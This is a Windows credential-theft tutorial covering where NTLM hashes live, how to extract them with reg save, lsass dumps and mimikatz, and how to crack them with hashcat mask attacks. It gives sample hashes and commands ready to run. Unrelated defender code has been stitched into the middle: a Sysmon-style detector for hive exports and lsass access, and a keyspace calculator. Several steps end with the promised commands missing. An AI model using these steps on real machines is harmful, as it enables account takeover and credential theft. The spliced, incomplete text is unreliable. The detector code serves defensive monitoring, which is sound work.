In this article, we will find out where the user password is stored in Windows, how to extract the data needed to crack a Windows password, how to crack a user password, and what a pass-the-hash attack is.
Not everyone uses a password on Windows – it is especially rare for users to set a password on a home computer that only one person works on. But in a corporate network, or when Windows is used as a server, a password is required. Another interesting property of a Windows user password: if a user has an online Microsoft account, the password hash is still stored on the local computer, and the cracked password can be used to log in both to the local computer and to Microsoft online services.
Where does Windows store the user login password?
Windows user passwords are stored in the SYSTEM and SAM hives of the Windows registry, which are kept in the files C:\Windows\System32\config\SYSTEM and C:\Windows\System32\config\SAM.
Instead of the plain-text password, Windows stores password hashes. These hashes can be brute-forced relatively easily. But even without cracking them, Windows password hashes can be used to collect data and carry out attacks.
How to get Windows password hashes
Dump Windows password hashes on a running computer
On a running system, it is problematic to access the files C:\Windows\System32\config\SAM and C:\Windows\System32\config\SYSTEM, because Windows keeps them open and locked while it runs, although it is possible. To save copies of these files, you can use the reg utility:
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv
In some tutorials the SECURITY hive is saved instead of SYSTEM – this is a mistake: you cannot recover the hashes from the SECURITY and SAM hives; SYSTEM and SAM are what is needed!
The password hash is also held in RAM, namely in the Local Security Authority Process (lsass.exe). This process is always running on a live Windows system, and you can dump it (a copy of the process memory is saved to disk as a file). You can use various utilities to create such a dump, including two official ones:
Task Manager is already present on every Windows system; to open it press Win+r, type taskmgr, then press ENTER. Or right-click on the taskbar (that is, the bottom bar where the clock, Start button, etc. are located) and select “Task Manager” in the context menu.
Wait for completion:
The output is quite extensive and there is a lot of data. Of interest are sequential lines of the form:
User : USERNAME
Hash NTLM: HASH
In my example, the interesting lines are:
User : ShareOverlord
Hash NTLM: 7ce21f17c0aee7fb9ceba532d0546ad6
User : Alexey
Hash NTLM: ca76a176340f0291e1cc8ea7277fc571
There are also lines with usernames:
User : MiAl
User : Администратор
But no NTLM hash line follows these, because these users do not have a password set in the system.
If you want to extract data from the registry files of the current operating system, first exit mimikatz by pressing Ctrl+c.
Now we will dump the SYSTEM and SAM registry hives of the current system:
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv
Run mimikatz again:
.\mimikatz.exe
Turn on logging:
log hash-local.txt
And we execute a command that points to the files into which the registry hive dumps were saved, that is, SystemBkup.hiv and SamBkup.hiv:
lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv
Output example:
Only one user with a hash was found here:
User : Администратор
Hash NTLM: 5187b179ba87f3ad85fea3ed718e961f
In fact, to extract NTLM hashes from the local system, it was not necessary to dump the registry hives. Another option is to raise the privileges of the mimikatz program itself and extract the hashes directly from the system. To do this, run the commands:
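What the two extraction paths above (a reg save of the SAM/SYSTEM hives, and a dump of the lsass.exe process) look like from the monitoring side, as an added example that is not part of the original article: it scans constructed Sysmon-style event lines and flags both. The flattened field layout, the sample lines and the choice of the PROCESS_VM_READ bit as the trigger are assumptions.

```python
# Added example (not from the original article): a defender-side check that flags
# the two extraction paths described above in constructed Sysmon-style events:
#   Event ID 1  - process creation running "reg save HKLM\SAM" / "HKLM\SYSTEM"
#   Event ID 10 - another process opening lsass.exe with memory-read rights
# The flattened "key=value|key=value" layout is an assumption about the SIEM.
import re

# Constructed sample events: three process creations and two lsass accesses.
SAMPLE_EVENTS = [
    "EventID=1|Image=C:\\Windows\\System32\\reg.exe|CommandLine=reg save HKLM\\SYSTEM SystemBkup.hiv",
    "EventID=1|Image=C:\\Windows\\System32\\reg.exe|CommandLine=reg save HKLM\\SAM SamBkup.hiv",
    "EventID=1|Image=C:\\Windows\\System32\\reg.exe|CommandLine=reg query HKLM\\SOFTWARE\\Microsoft",
    "EventID=10|SourceImage=C:\\Windows\\System32\\Taskmgr.exe"
    "|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1FFFFF",
    "EventID=10|SourceImage=C:\\Windows\\System32\\svchost.exe"
    "|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1000",
]

# "reg save" of the hives holding credential material (SECURITY included: it is
# useless for NTLM recovery, as the article notes, but it is still a hive export).
HIVE_SAVE = re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:SAM|SYSTEM|SECURITY)\b", re.IGNORECASE)
PROCESS_VM_READ = 0x0010  # access-mask bit needed to read another process's memory

def parse_event(line):
    """Split one flattened event line into a field dictionary."""
    return dict(field.split("=", 1) for field in line.split("|"))

def classify(event):
    """Return a finding for one parsed event, or None if it looks benign."""
    if event.get("EventID") == "1" and HIVE_SAVE.search(event.get("CommandLine", "")):
        return "SAM/SYSTEM hive export via reg save: " + event["CommandLine"]
    if event.get("EventID") == "10" and event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        granted = int(event.get("GrantedAccess", "0"), 16)
        if granted & PROCESS_VM_READ:  # 0x1000 (query limited info) alone does not trigger
            return "lsass.exe opened with VM_READ by " + event.get("SourceImage", "?")
    return None

def scan(lines):
    """Return (line index, finding) pairs for every suspicious event."""
    findings = []
    for i, line in enumerate(lines):
        finding = classify(parse_event(line))
        if finding:
            findings.append((i, finding))
    return findings
```

Running scan(SAMPLE_EVENTS) reports the two hive exports and the Task Manager access to lsass.exe, while the reg query and the low-privilege svchost access pass silently.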
How to extract NTLM hash from lsass.DMP file
Logically (and in practice), the dump of the Local Security Authority Process should contain only the hash of the user who logged in with a password.
First, specify the path to the dump file with a command of the form:
sekurlsa::minidump C:\path\to\lsass.DMP
For instance:
sekurlsa::minidump C:\Share-Server\files\lsass.DMP
Then run the command:
How to brute-force NTLM hash
For hacking I will take the following hash:
User : Alexey
Hash NTLM: ca76a176340f0291e1cc8ea7277fc571
Take a look at the Hashcat help to find out the NTLM hash mode number:
1000 | NTLM | Operating Systems
That is, the hashcat mode number for NTLM is 1000.
To launch a mask attack to crack NTLM in Hashcat, you need to run a command of the form:
hashcat -m 1000 -a 3 'HASH' MASK
An example of my real command:
hashcat --force --hwmon-temp-abort=100 -m 1000 -D 1,2 -a 3 -i --increment-min 1 --increment-max 10 -1 ?l?d ca76a176340f0291e1cc8ea7277fc571 ?1?1?1?1?1?1?1?1?1
In this command:
hashcat is the name of the executable file. On Windows, it could be hashcat64.exe.
--force means ignore warnings
--hwmon-temp-abort=100 sets the maximum temperature at which the brute-force attack is aborted to 100 degrees Celsius
-m 1000 means the NTLM hash type
-D 1,2 means use both the central processor and the video card for brute-forcing
-a 3 means mask attack
-i means gradually increase the number of characters in the generated passwords
--increment-min 1 means start with a mask length of one
--increment-max 10 means end the search at a mask length of ten
-1 ?l?d defines custom character set number 1, which includes lowercase Latin letters (?l) and digits (?d)
ca76a176340f0291e1cc8ea7277fc571 is the hash to crack
?1?1?1?1?1?1?1?1?1 is a mask built from the custom character set
Let's hack one more hash:
User : Администратор
Hash NTLM: 5187b179ba87f3ad85fea3ed718e961f
Command (another hash and another custom character set):
hashcat --force --hwmon-temp-abort=100 -m 1000 -D 1,2 -a 3 -i --increment-min 1 --increment-max 10 -1 ?l?u?d 5187b179ba87f3ad85fea3ed718e961f ?1?1?1?1?1?1?1?1?1
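To judge what the two mask attacks above cost, and therefore what a password policy should demand, the following added example (not code from the article or from hashcat) computes the keyspace hashcat enumerates for a mask with custom charsets under --increment-min/--increment-max. The built-in charset sizes are hashcat's documented ones; the hash rate passed to hours_at is whatever the reader assumes for their own hardware.

```python
# Added example (not from the original article): count the candidates hashcat
# generates for a mask such as the two commands above, so the cost of a 9-character
# ?l?d versus ?l?u?d password can be judged when writing a password policy.
# Charset sizes follow hashcat's built-ins: ?l 26, ?u 26, ?d 10, ?s 33, ?a 95.
import math
import string

BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,  # space plus the 32 ASCII punctuation marks
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]

def tokens(spec):
    """Split a mask or charset spec into '?x' tokens and single literal characters."""
    out, i = [], 0
    while i < len(spec):
        n = 2 if spec[i] == "?" and i + 1 < len(spec) else 1
        out.append(spec[i:i + n])
        i += n
    return out

def token_chars(tok, custom):
    """Characters one token can produce; custom maps '1'..'4' to expanded -1..-4 sets."""
    if len(tok) == 1:
        return {tok}
    key = tok[1]
    return {"?"} if key == "?" else custom.get(key, set(BUILTIN.get(key, "")))

def expand_charset(spec, custom=None):
    """Union of all characters a charset spec like '?l?d' covers."""
    return set().union(*(token_chars(t, custom or {}) for t in tokens(spec)))

def keyspace(mask, custom_specs=None, inc_min=None, inc_max=None):
    """Total candidates for MASK. With -i, every length from inc_min to inc_max is
    tried, but never beyond the mask's own number of positions."""
    custom = {k: expand_charset(v) for k, v in (custom_specs or {}).items()}
    sizes = [len(token_chars(t, custom)) for t in tokens(mask)]
    lo, hi = inc_min or len(sizes), min(inc_max or len(sizes), len(sizes))
    return sum(math.prod(sizes[:n]) for n in range(lo, hi + 1))

def hours_at(candidates, hashes_per_second):
    """Wall-clock hours to exhaust a keyspace at the given NTLM hash rate."""
    return candidates / hashes_per_second / 3600
```

For the first command, keyspace("?1?1?1?1?1?1?1?1?1", {"1": "?l?d"}, 1, 10) sums 36^1 through 36^9, while the ?l?u?d variant sums 62^1 through 62^9, roughly 130 times more work at the same hash rate.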
So, in this article, we learned how to extract an NTLM hash and crack a Windows password. But what if you fail to crack NTLM? See the second part, entitled “Pass-the-hash attack (how to use NTLM without cracking a password)” for the answer.